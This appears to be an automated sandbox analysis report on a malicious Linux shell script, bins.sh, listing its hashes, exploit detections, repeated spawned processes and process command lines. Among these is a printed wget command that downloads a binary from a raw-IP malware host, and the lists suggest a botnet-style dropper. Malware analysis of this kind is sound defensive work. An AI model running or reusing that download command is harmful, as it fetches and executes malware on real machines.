File name:

bins.sh

Full analysis: https://app.any.run/tasks/3084eeb3-d6a1-4845-a923-f8721a6e9258
Verdict: Malicious activity
Analysis date: December 14, 2024, 00:58:37
OS: Ubuntu 22.04.2 LTS
Tags:
exploit
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable, with very long lines (405)
MD5:

1BF98EC0F208DAADC02C99C268E05E7F

SHA1:

F01A22BC4E069C72BBA4D5913A647460D229D3D6

SHA256:

C95B5862E15714E933D052115B87EBD97BE2CD1B93584D18AD18A6F5956A1980

SSDEEP:

192:ULUNp4xZUpmexeaW6dioIVNoIeJfNp4xZumexeaz:ULUNp4xZUC6dioIVNoIeJfNp4xZw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • EXPLOIT has been detected (SURICATA)

      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38973)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38974)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39009)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39064)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39020)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39065)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39010)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39071)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39075)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39070)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39078)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39093)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39098)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39103)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39097)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39094)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39102)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39090)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39106)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39074)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39079)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39107)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39111)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39108)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39112)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39115)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39116)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39019)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39123)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39132)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39127)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39124)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39131)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39089)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39137)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39136)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39141)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39140)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39145)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39146)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39154)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39153)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39150)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39119)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39120)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39162)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39163)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39158)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39128)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39157)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39149)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39088)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38740)

    • Potential Corporate Privacy Violation

      • wget (PID: 38796)
      • wget (PID: 38747)
      • wget (PID: 39008)
      • wget (PID: 38972)
      • wget (PID: 39045)
      • busybox (PID: 39040)
      • busybox (PID: 38856)
      • busybox (PID: 38967)
      • busybox (PID: 39003)
      • busybox (PID: 38822)
      • busybox (PID: 38791)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 38744)

    • Executes commands using command-line interpreter

      • sudo (PID: 38743)

    • Uses wget to download content

      • bash (PID: 38744)

    • Connects to unusual port

      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38860)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38858)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38868)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38866)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38864)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38862)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38865)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38857)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38867)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38861)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38863)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38870)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38878)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38877)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38871)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38883)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38882)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38873)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38874)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38884)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38888)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38876)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38889)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38881)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38880)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38872)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38875)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38887)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38885)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38894)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38892)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38890)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38886)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38891)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38895)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38893)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38896)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38897)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38901)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38898)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38905)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38899)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38909)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38903)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38902)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38906)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38904)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38907)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38900)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38910)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38908)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38911)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38913)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38917)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38915)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38919)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38922)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38925)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38923)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38929)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38916)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38920)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38927)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38932)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38918)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38921)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38924)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38912)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38930)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38926)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38931)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38914)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38933)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38934)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38935)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38936)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38937)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38928)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38938)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39088)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39101)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 38939)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39106)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39144)
      • NNliaHV8Ft3P36uFldntUIbhoxh0JUJHhB (deleted) (PID: 39161)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
466
Monitored processes
258
Malicious processes
138
Suspicious processes
2

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs rm no specs wget snap no specs snap-seccomp no specs tracker-extract-3 no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs busybox chmod no specs bash no specs rm no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs busybox chmod no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb nnliahv8ft3p36ufldntuibhoxh0jujhhb no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb no specs rm no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs busybox nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) chmod no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) h05dlumwbs5nidamuwe36sfjp7esrqlzax no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) rm no specs nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs busybox chmod no specs bash no specs rm no specs wget #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs busybox chmod no specs bash no specs rm no specs wget #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) snap no specs #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) snap-seccomp no specs snap-confine no specs snap-confine no specs busybox chmod no specs bash no specs rm no specs wget snap no specs snap-seccomp no specs #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) no specs #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) #EXPLOIT nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted) nnliahv8ft3p36ufldntuibhoxh0jujhhb (deleted)

Process information

PID
CMD
Path
Indicators
Parent process
38739/bin/sh -c "sudo chown user /tmp/bins\.sh && chmod +x /tmp/bins\.sh && DISPLAY=:0 sudo -iu user /tmp/bins\.sh "/usr/bin/dashany-guest-agent
User:
root
Integrity Level:
UNKNOWN
38740sudo chown user /tmp/bins.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38741chown user /tmp/bins.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38742chmod +x /tmp/bins.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38743sudo -iu user /tmp/bins.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
38744/bin/bash /tmp/bins.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
38745/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38746/bin/rm bins.sh/usr/bin/rmbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
38747wget http://37.44.238.68/bins/flFp11gOKS5O1KbuHBReEPxs9O6CXUsqN4/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
